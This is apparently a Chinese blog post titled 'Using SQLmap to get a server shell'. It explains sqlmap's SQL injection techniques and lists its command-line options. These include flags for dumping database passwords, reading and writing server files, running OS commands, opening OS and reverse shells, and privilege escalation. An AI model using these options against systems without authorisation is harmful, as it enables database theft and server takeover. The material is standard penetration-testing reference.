利用SQLmap 拿服务器shell

墨蓝 2022-04-10 12:54 197阅读 0赞

sqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用六种独特的SQL注入技术，分别是：

1）基于布尔的盲注，即可以根据返回页面判断条件真假的注入  
2）基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。  
3）基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。  
4）联合查询注入，可以使用union的情况下的注入。  
5）堆查询注入，可以同时执行多条语句的执行时的注入。  
6）DNS注入，利用URL带出数据库的信息。

\-u \#注入点  
–sql-shell 返回sql shell  
\-f \#指纹判别数据库类型  
\-b \#获取数据库版本信息  
\-p \#指定可测试的参数(?page=1&id=2 -p “page,id”)  
\-D “” \#指定数据库名  
\-T “” \#指定表名  
\-C “” \#指定字段  
\-s “” \#保存注入过程到一个文件,还可中断，下次恢复在注入(保存：-s “xx.log”　　恢复:-s “xx.log” --resume)  
–level=(1-5) \#要执行的测试水平等级，默认为1  
–risk=(0-3) \#测试执行的风险等级，默认为1  
–time-sec=(2,5) \#延迟响应，默认为5  
–data \#通过POST发送数据  
–columns \#列出字段  
–current-user \#获取当前用户名称  
–current-db \#获取当前数据库名称  
–users \#列数据库所有用户  
–passwords \#数据库用户所有密码  
–privileges \#查看用户权限(–privileges -U root)  
\-U \#指定数据库用户  
–prefix=PREFIX 注入payload 字符串前缀  
–suffix=SUFFIX 注入 payload 字符串后缀  
–dbs \#列出所有数据库  
–tables -D “” \#列出指定数据库中的表  
–columns -T “user” -D “mysql” \#列出mysql数据库中的user表的所有字段  
–dump-all \#列出所有数据库所有表  
–exclude-sysdbs \#只列出用户自己新建的数据库和表  
–dump -T “” -D “” -C “” \#列出指定数据库的表的字段的数据(–dump -T users -D master -C surname)  
–dump -T “” -D “” --start 2 --top 4 \# 列出指定数据库的表的2-4字段的数据  
–dbms \#指定数据库(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)  
–os \#指定系统(Linux,Windows)  
–counts \#列出表中数据条数  
\-v \#详细的等级(0-6)  
0：只显示Python的回溯，错误和关键消息。  
1：显示信息和警告消息。  
2：显示调试消息。  
3：有效载荷注入。  
4：显示HTTP请求。  
5：显示HTTP响应头。  
6：显示HTTP响应页面的内容  
–privileges \#查看权限  
–is-dba \#是否是数据库管理员  
–roles \#枚举数据库用户角色  
–udf-inject \#导入用户自定义函数（获取系统权限）  
–union-check \#是否支持union 注入  
–union-cols \#union 查询表记录  
–union-test \#union 语句测试  
–union-use \#采用union 注入  
–union-tech orderby \#union配合order by  
–data “” \#POST方式提交数据(–data “page=1&id=2”)  
–cookie “用;号分开” \#cookie注入(–cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”)  
–referer “” \#使用referer欺骗(–referer “[http://www.baidu.com][http_www.baidu.com]”)  
–user-agent “” \#自定义user-agent  
–proxy “[http://127.0.0.1:8118][http_127.0.0.1_8118]” \#代理注入  
–string="" \#指定关键词,字符串匹配.  
–threads 　　 \#采用多线程(–threads 3)  
–sql-shell \#执行指定sql命令  
–sql-query \#执行指定的sql语句(–sql-query “SELECT password FROM mysql.user WHERE user = ‘root’ LIMIT 0, 1” )  
–file-read \#读取指定文件  
–file-write \#写入本地文件(–file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)  
–file-dest \#要写入的文件绝对路径  
–os-cmd=id \#执行系统命令  
–os-shell \#系统交互shell  
–os-pwn \#反弹shell(–os-pwn --msf-path=/opt/framework/msf3/)  
–msf-path= \#matesploit绝对路径(–msf-path=/opt/framework/msf3/)  
–os-smbrelay \#  
–os-bof \#  
–reg-read \#读取win系统注册表  
–priv-esc \#  
–time-sec= \#延迟设置 默认–time-sec=5 为5秒  
\-p “user-agent” --user-agent “sqlmap/0.7rc1 ([http://sqlmap.sourceforge.net][http_sqlmap.sourceforge.net])” \#指定user-agent注入  
–eta \#盲注

[http_www.baidu.com]: http://www.baidu.com
[http_127.0.0.1_8118]: http://127.0.0.1:8118
[http_sqlmap.sourceforge.net]: http://sqlmap.sourceforge.net